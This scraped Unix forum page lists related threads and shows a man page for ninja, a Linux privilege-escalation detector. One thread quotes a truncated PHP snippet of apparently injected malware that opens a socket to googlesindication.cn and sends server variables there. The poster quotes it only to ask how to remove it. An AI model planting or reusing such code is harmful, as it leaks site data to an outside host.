|
|
Sponsored Content
Operating Systems
Linux
Debian
Malicious perl script
Post 302992364 by drysdalk on Friday 24th of February 2017 07:49:10 AM
02-24-2017
|
|
7 More Discussions You Might Find Interesting
1. Shell Programming and Scripting
Hello,
Please advise a script/command to remove the following line for a file
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER;
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies
2. Shell Programming and Scripting
Hello
I ask you how to make a
Anti-malicious files and viruses
Or if one of you a small example of the work on the same place and I hope my request
I want a small patch or the process of examination Virus
http://www.google.jo/images/cleardot.gif
---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies
3. Cybersecurity
A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work:
CSI:Internet - Alarm at the pizza service
CSI:Internet - The image of death
CSI:Internet - PDF timebomb
CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies
4. Shell Programming and Scripting
I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard.
From parent.pl
$input1=123;
$input2=abc;
I tried calling it with
system("/usr/bin/perl child.pl $input1 $input2");
and
`perl... (1 Reply)
Discussion started by: grajp002
1 Replies
5. Shell Programming and Scripting
Hi All,
I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ??
print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">");
print("<input type = "text"... (1 Reply)
Discussion started by: scriptscript
1 Replies
6. Shell Programming and Scripting
Hello,
i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin:
Posting links to pastebin scripts are forbidden at this site.
Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies
7. Programming
I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open())
I would like to run another PERL-script from first one, not... (1 Reply)
Discussion started by: alex_5161
1 Replies
LEARN ABOUT DEBIAN
ninja
NINJA(8) NINJA(8) NAME
ninja - Privilege escalation detection system for GNU/Linux SYNOPSIS
ninja filename DESCRIPTION
Ninja is a privilege escalation detection and prevention system for GNU/Linux hosts. While running, it will monitor process activity on the local host, and keep track of all processes running as root. If a process is spawned with UID or GID zero (root), ninja will log necessary information about this process, and optionally kill the process if it was spawned by an unauthorized user. A "magic" group can be specified, allowing members of this group to run any setuid/setgid root executable. Individual executables can be whitelisted. Ninja uses a fine grained whitelist that lets you whitelist executables on a group and/or user basis. This can be used to allow specific groups or individual users access to setuid/setgid root programs, such as su(1) and passwd(1). CONFIGURATION
Ninja requires a configuration file to run. For more information about the configuration, please refer to the "default.conf" file, located at "/usr/share/doc/ninja/examples/" in the source tree. There, all the available options are explained in detail. WHITELIST
The whitelist is a plain text file, containing new-line separated entries. Entries consists of three fields, separated by colons. The first field is the full path to the executable you wish to whitelist. The second field is a comma separated list of groups that should be granted access to the executable. The third field is a comma separated list of users. <executable>:<groups>:<users> The second or third field can be left empty. Please refer to the example whitlist located in "/usr/share/doc/ninja/examples/". Remember that it is a good idea to whitelist programs such as passwd(1) and other regular setuid applications that users require access to. SECURITY
The goal of this application is to be able to detect and stop local, and possibly also remote exploits. It is important to note that ninja cannot prevent attackers from running exploits, as a successful exploitation only will be detected AFTER the attacker has gained root. How- ever, when ninja is running with a short scanning cycle, this detection happens nearly immediately. The security lies in the fact that we stop the attacker before he/she has time to do anything nasty to the system, and it gives us the opportunity to disable the attacker's shell access, and lock him/her out of the system. In an ideal environment, ninja should be run together with kernel hardening systems such as grsecurity (www.grsecurity.net) as this will allow for some protection of the ninja process. This is not a complete security system. Do not rely on it to keep your system safe. BUGS
Please let me know if you should stumble across any bugs or other weirdness. I greatly appreciate all bug reports, patches, ideas, sugges- tions and comments. LICENSE
Ninja is released under the General Public License (GPL) version 2 or higher. AUTHOR
Tom Rune Flo <tom@x86.no> August 2005 NINJA(8)